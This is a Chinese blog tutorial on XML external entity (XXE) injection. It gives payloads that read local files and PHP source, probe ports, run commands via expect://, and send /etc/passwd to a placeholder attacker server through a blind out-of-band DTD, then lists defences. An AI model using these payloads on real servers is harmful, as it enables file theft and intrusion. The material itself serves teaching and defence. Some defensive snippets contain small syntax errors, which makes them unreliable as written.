

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Aries.ico">
  <link rel="icon" href="/img/Aries.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="YY">
  <meta name="keywords" content="">
  
    <meta name="description" content="xml实体注入XXE，即XML外部实体注入，由于程序在解析输入的XML数据时，解析了攻击者伪造的外部实体而产生的。 XXE危害：  读取任意文件 执行系统命令，但需要expect插件 扫描网站的端口以及是否存在某些文件或目录 通过HTTP协议发起SSRF攻击  XML定义XML是可扩展标记语言，其文档结构包括：  XML文档声明 XML文档类型定义（DTD），XXE漏洞所在位置 XML文档元素">
<meta property="og:type" content="article">
<meta property="og:title" content="[渗透测试] xml实体注入">
<meta property="og:url" content="https://s1n9l3.github.io/2022/10/11/[%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95]%20xml%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="S1n9l3">
<meta property="og:description" content="xml实体注入XXE，即XML外部实体注入，由于程序在解析输入的XML数据时，解析了攻击者伪造的外部实体而产生的。 XXE危害：  读取任意文件 执行系统命令，但需要expect插件 扫描网站的端口以及是否存在某些文件或目录 通过HTTP协议发起SSRF攻击  XML定义XML是可扩展标记语言，其文档结构包括：  XML文档声明 XML文档类型定义（DTD），XXE漏洞所在位置 XML文档元素">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/20190402221806316.png">
<meta property="article:published_time" content="2022-10-11T11:52:00.349Z">
<meta property="article:modified_time" content="2022-11-23T12:51:36.317Z">
<meta property="article:author" content="YY">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="xml实体注入">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/20190402221806316.png">
  
  
  
  <title>[渗透测试] xml实体注入 - S1n9l3</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"s1n9l3.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>WXYY</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/post.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="[渗透测试] xml实体注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-10-11 19:52" pubdate>
          2022年10月11日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          34 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">[渗透测试] xml实体注入</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="xml实体注入"><a href="#xml实体注入" class="headerlink" title="xml实体注入"></a>xml实体注入</h1><p>XXE，即XML外部实体注入，由于程序在解析输入的XML数据时，解析了攻击者伪造的外部实体而产生的。</p>
<p>XXE危害：</p>
<ol>
<li>读取任意文件</li>
<li>执行系统命令，但需要<code>expect</code>插件</li>
<li>扫描网站的端口以及是否存在某些文件或目录</li>
<li>通过HTTP协议发起SSRF攻击</li>
</ol>
<h2 id="XML定义"><a href="#XML定义" class="headerlink" title="XML定义"></a>XML定义</h2><p>XML是可扩展标记语言，其文档结构包括：</p>
<ul>
<li>XML文档声明</li>
<li>XML文档类型定义（DTD），XXE漏洞所在位置</li>
<li>XML文档元素</li>
</ul>
<p>一个例子：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br> &lt;!DOCTYPE root[<br> &lt;!ELEMENT A   &quot;i&quot;&gt;<br> &lt;!ELEMENT B   &quot;am&quot;&gt;<br> &lt;!ELEMENT C   &quot;hacker&quot;&gt;<br> ]&gt;<br> &lt;root&gt;<br>     &lt;A&gt;&amp;A;&lt;/A&gt;<br>     &lt;B&gt;&amp;B;&lt;/B&gt;<br>     &lt;C&gt;&amp;C;&lt;/C&gt;<br> &lt;/root&gt;<br> <br></code></pre></td></tr></table></figure>

<p>还有一个例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;!-- 文档声明 --&gt;<br>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br>&lt;!-- 文档类型定义 --&gt;<br>&lt;!DOCTYPE note[                           &lt;!--定义此文档为note类型--&gt;<br>	&lt;!ELEMENT note (to,from,heading,body)&gt;&lt;!--定义note有四个元素--&gt;<br>	&lt;!ELEMENT to   (#PCDATA)&gt;<br>	&lt;!ELEMENT from   (#PCDATA)&gt;<br>	&lt;!ELEMENT heading   (#PCDATA)&gt;<br>	&lt;!ELEMENT body   (#PCDATA)&gt;           &lt;!--定义元素的类型为#PCDATA--&gt;<br>]&gt;<br>&lt;!-- 文档元素 --&gt;<br>&lt;note&gt;<br>&lt;to&gt;Alice&lt;/to&gt;<br>&lt;from&gt;Bob&lt;/from&gt;<br>&lt;heading&gt;Reminder&lt;/heading&gt;<br>&lt;body&gt;I miss you !&lt;/body&gt;<br>&lt;/note&gt;<br></code></pre></td></tr></table></figure>



<h2 id="DTD结构"><a href="#DTD结构" class="headerlink" title="DTD结构"></a>DTD结构</h2><p>DTD包括以下几种定义：</p>
<ul>
<li>元素类型声明<code>&lt;!ELEMENT&gt;</code></li>
<li>属性表声明<code>&lt;!ATTLIST&gt;</code></li>
<li>实体声明<code>&lt;!ENTITY&gt;</code></li>
<li>记号声明<code>&lt;!NOTATION&gt;</code></li>
</ul>
<p>DTD声明有两种方式：</p>
<ul>
<li>内部声明：<code>&lt;!DOCTYPE 根元素 [元素声明]&gt;</code></li>
<li>外部声明：<br><code>&lt;!DOCTYPE 根元素 SYSteM &quot;文件名&quot;&gt;</code><br><code>&lt;!DOCTYPE 根元素 PUBLIC &quot;public_ID&quot; &quot;文件名&quot;&gt;</code></li>
</ul>
<p>实体声明有两种方式：</p>
<ul>
<li>内部声明：<code>&lt;!ENTITY 实体名称 &quot;实体值&quot;&gt;</code></li>
<li>外部声明：<br><code>&lt;!ENTITY 实体名称 SYSTEM &quot;URI/URL/协议&quot;&gt;</code><br><code>&lt;!ENTITY 实体名称 PUBLIC &quot;public_ID&quot; &quot;URI&quot;&gt;</code></li>
</ul>
<p>XML在外部引用时支持的协议：</p>
<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/20190402221806316.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h2 id="判断是否存在XXE"><a href="#判断是否存在XXE" class="headerlink" title="判断是否存在XXE"></a>判断是否存在XXE</h2><p>在<strong>输入框</strong>或URL参数中输入一些XML标签，如<code>&lt;username&gt;Hello&lt;/username&gt;</code>，如果页面回显<code>Hello</code>，则说明这个标签被后台调用，说明存在XXE。</p>
<p>但是有的时候，这些注入点可能不是那么明显，<strong>如一些仅适用 JSON 去访问服务的客户端</strong>。我们可以通过修改 HTTP 请求，修改 Content-Type 头部字段等方法，然后去查看<strong>响应包</strong>，查看程序是否解析了发送的内容，如果解析了，则存在 XXE 攻击漏洞。</p>
<p>现实中存在的大多数 XXE 漏洞都是 <code>Blind XXE</code>，即不可见的，必须采用带外通道才能查看返回信息的记录。</p>
<h2 id="XXE实例"><a href="#XXE实例" class="headerlink" title="XXE实例"></a>XXE实例</h2><h3 id="读取txt格式文件（file协议）"><a href="#读取txt格式文件（file协议）" class="headerlink" title="读取txt格式文件（file协议）"></a>读取txt格式文件（file协议）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE a [<br>	&lt;!ENTITY test SYSTEM &quot;file:///var/www/html/test.txt&quot;&gt;<br>]&gt;<br>&lt;c&gt;&amp;test;&lt;/c&gt;<br></code></pre></td></tr></table></figure>

<p>这里调用了一个外部实体，将本机 test.txt 文件的内容赋值给实体 test。此处造成了 XML 实体注入攻击。</p>
<h3 id="读取PHP格式文件（PHP协议）"><a href="#读取PHP格式文件（PHP协议）" class="headerlink" title="读取PHP格式文件（PHP协议）"></a>读取PHP格式文件（PHP协议）</h3><p>因为 PHP 中有 <code>&lt;?php ?&gt;</code>，当 XML 解析时，遇到 <code>&lt;?</code> 这类的符号时，会将 PHP 当做 XML 去解析，所以会报错，故需要将其进行 <strong>base64 编码</strong>读出。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE a[<br>	&lt;!ENTITY test SYSTEM &quot;php://filter/read=convert.base64-encode/resource=index.php&quot;&gt;<br>]&gt;<br>&lt;c&gt;&amp;test&lt;/c&gt;<br></code></pre></td></tr></table></figure>

<p>通过 PHP 协议的 filter 输出流读取 PHP，并经过 base64 编码，这样 XML 就不会去解析 PHP 中的 <code>&lt;?</code> ，就不会报错，故可以成功读出 PHP 文件的源码内容。</p>
<h3 id="探测端口是否开启或文件是否存在（HTTP协议）"><a href="#探测端口是否开启或文件是否存在（HTTP协议）" class="headerlink" title="探测端口是否开启或文件是否存在（HTTP协议）"></a>探测端口是否开启或文件是否存在（HTTP协议）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE a[<br>	&lt;!ENTITY test SYSTEM &quot;http://127.0.0.1:3306&quot;&gt;<br>]&gt;<br>&lt;c&gt;&amp;test&lt;/c&gt;<br></code></pre></td></tr></table></figure>

<p>根据页面返回的报错信息或内容来判断端口是否开启，可以通过 <code>BurpSuite</code> 抓包来查看。</p>
<p><strong>通过此方法也可以来查看目录或者文件是否存在。</strong></p>
<h3 id="执行命令（expect协议）"><a href="#执行命令（expect协议）" class="headerlink" title="执行命令（expect协议）"></a>执行命令（expect协议）</h3><p>若想执行协议，则需要目标主机上安装了 <code>expect</code> 插件，并且做了相关配置。条件较苛刻，所以比较少见。</p>
<p>同时还有一点需要注意：<strong>所执行的命令不允许含有空格</strong>。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE a[<br>	&lt;!ENTITY test SYSTEM &quot;expect://ls&quot;&gt;<br>]&gt;<br>&lt;c&gt;&amp;test&lt;/c&gt;<br></code></pre></td></tr></table></figure>

<h3 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h3><p>若服务器没有回显，那么只能使用 Blind XXE 来构建一条<strong>带外数据</strong> (OOB) 通道来读取数据。</p>
<blockquote>
<p>带有 <code>%</code> 的实体是一个参数实体，只有参数实体才能在 DTD 使用，且只能在外部 DTD 中使用。</p>
</blockquote>
<p>思路是这样的：</p>
<ol>
<li><p>攻击者发送 XML 给 Web 服务器，该 XML 文件中引用了一个外部实体；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;<br>&lt;!DOCTYPE root[<br>	&lt;!ENTITY % remote SYSTEM http://攻击者的服务器IP/test.xml&gt;<br>	%remote;<br>]&gt;<br></code></pre></td></tr></table></figure>


</li>
<li><p>Web 服务器解析 攻击者 发送的 XML，根据 XML 向 攻击者的服务器 请求<strong>获取恶意 DTD</strong>；</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs xml-dtd">&lt;!ENTITY % payload SYSTEM &quot;file:///etc/passwd&quot;&gt;<br>&lt;!ENTITY % int &quot;&lt;!ENTITY % trick SYSTEM &#x27;http://攻击者服务器 IP/%payload;&#x27;&gt;&quot;&gt;<br>%int；<br>%trick；<br></code></pre></td></tr></table></figure>


</li>
<li><p>Web 服务器获取到 恶意 DTD 后，根据其内容，带着含有 Web 服务器上的信息去访问 攻击者服务器上的 HTTP 或 FTP；</p>
</li>
<li><p>攻击者可以通过 <strong>请求日志 来查看请求的参数</strong>来获取信息。</p>
</li>
</ol>
<p>当 Web 服务器请求到恶意文件，并到 Web 服务器上进行解析时，会<strong>先通过 file 协议读取到 Web 服务器 (本机) 的 &#x2F;etc&#x2F;passwd 文件的内容，并赋给参数实体 %payload</strong>。</p>
<p>然后再<strong>使用 http 协议，携带者刚刚请求得到的 %payload 的内容作为参数，去访问 攻击者的服务器</strong>。</p>
<p>这样在攻击者的服务器的<strong>日志中就会留下相应的请求信息</strong>，攻击者就可以通过浏览日志来获取相应的敏感信息。</p>
<h2 id="XXE防御方法"><a href="#XXE防御方法" class="headerlink" title="XXE防御方法"></a>XXE防御方法</h2><h3 id="禁用外部实体"><a href="#禁用外部实体" class="headerlink" title="禁用外部实体"></a>禁用外部实体</h3><p>不同的语言有不同的禁用方式：</p>
<ol>
<li><p>PHP</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">libxml_disable_entity_loader</span>(<span class="hljs-literal">true</span>);<br></code></pre></td></tr></table></figure>
</li>
<li><p>JAVA</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">DocumentBuilderFactory</span> <span class="hljs-variable">dbf</span> <span class="hljs-operator">=</span> DocumentBuilderFactory.newInstance();<br>dbf.setExpandEntityReferences(<span class="hljs-literal">false</span>);<br></code></pre></td></tr></table></figure>
</li>
<li><p>Python</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> lxml <span class="hljs-keyword">import</span> etree:<br>xmlData = etree.parse(xmlSource, etree.XMLParser(resolve_entities = FALSE))<br></code></pre></td></tr></table></figure></li>
</ol>
<h3 id="过滤用户提交的XML数据"><a href="#过滤用户提交的XML数据" class="headerlink" title="过滤用户提交的XML数据"></a>过滤用户提交的XML数据</h3><p>可以过滤一些关键字，如：**&lt;!DOCTYPE&gt;、&lt;!ENTITY&gt;、SYSTEM、PUBLIC** 等。</p>
<h3 id="不允许-XML-含有自己定义的-DTD"><a href="#不允许-XML-含有自己定义的-DTD" class="headerlink" title="不允许 XML 含有自己定义的 DTD"></a>不允许 XML 含有自己定义的 DTD</h3>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-chain-item">渗透测试</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">#渗透测试</a>
      
        <a href="/tags/xml%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5/">#xml实体注入</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>[渗透测试] xml实体注入</div>
      <div>https://s1n9l3.github.io/2022/10/11/[渗透测试] xml实体注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>YY</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2022年10月11日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/10/15/%5B%E5%B7%A5%E5%85%B7%5D%20sqlmap%E6%95%99%E7%A8%8B/" title="[工具] sqlmap教程">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">[工具] sqlmap教程</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/10/10/%5B%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%5D%20sql%E6%B3%A8%E5%85%A5/" title="[渗透测试] 学习-sql注入">
                        <span class="hidden-mobile">[渗透测试] 学习-sql注入</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
